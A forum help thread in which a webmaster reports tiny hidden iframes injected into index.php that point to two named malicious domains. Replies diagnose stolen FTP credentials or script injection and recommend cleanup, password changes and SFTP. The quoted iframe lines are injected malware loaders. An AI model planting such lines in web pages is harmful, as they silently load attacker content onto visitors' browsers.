Mysterious html inserted into my site's pages (hacked?)

Twice, I've found weird code the top of my index.php.

The first time, it was this:

<iframe src="http://ntwportal.com/" width="2" height="4"></iframe>

Then this:

<iframe src="http://gtwdnsglobe.org/" width="2" height="4"></iframe>

How is this happening? Do I have a security flaw?

No one who has FTP access (that I know of) would do this. I recently deployed a new site, and this is still happening.


Probably a virus.

http://www.google.com/safebrowsing/diagnostic?site=http://ntwportal.com/&hl=en

Is the HTML also on your local computer? you might have a virus that inserted it. Otherwise, check the host's security, it might have been broken into.


Yes, you're hacked, by the usual Russian-sphere adult-webmaster suspects. Those sites are down at the moment but they are known infection vectors.

Is the iframe code in the .php file itself when you re-download it from the server, or is it only in its output?

In the former case, either the server itself is compromised (is it your server or a third party's?), or you've been lax in setting the permissions so that the webserver user can write to the files, or — more likely in this case I think — you or one of the other people with FTP access to your account has had their password stolen by a trojan they will have picked up by a similar infection on another site.

In the latter case, it could come from the database if you have an application-level compromise in your PHP scripts (SQL and script injection, which are extremely common in badly-written PHP), or, if there's no sign in the source or the database, it could again be a server-level compromise.

Nuke the site, ensure your own machine is clean(*), change passwords, and stop using FTP. There is no reason not to migrate to SFTP in this century.

(*: don't assume your machine is clean just because you have one anti-virus that says so. Today's anti-virus is almost useless at detecting and especially cleaning malware. If you've been hit by a sploit in the past, you're very probably still infected with something the AV didn't catch.)


If you're accepting any type of input on your pages, make sure that it it being escaped properly. Sounds like a case of script injection. If you're looking for more information, a search for SQL injection, script injection, or cross-site scripting should yield some results.


This is a well-known, widespread FTP spyware/bot/hack/thing. You or someone else that has the password to your FTP server has spyware on their computer that logged the password, and sent it to some evil people. Those evil people than ran a bot that connected to your FTP server, and appended an <iframe> at the bottom of every HTML/PHP-page. What you should do is get rid of the spyware, and then change the password to your FTP server.


When I type "http://ntwportal.com/" in Google, avast stops me from seeing the search results with a virus warning. It's possible that somehow your FTP has been compromised. You should reinstall everything and change all your passwords.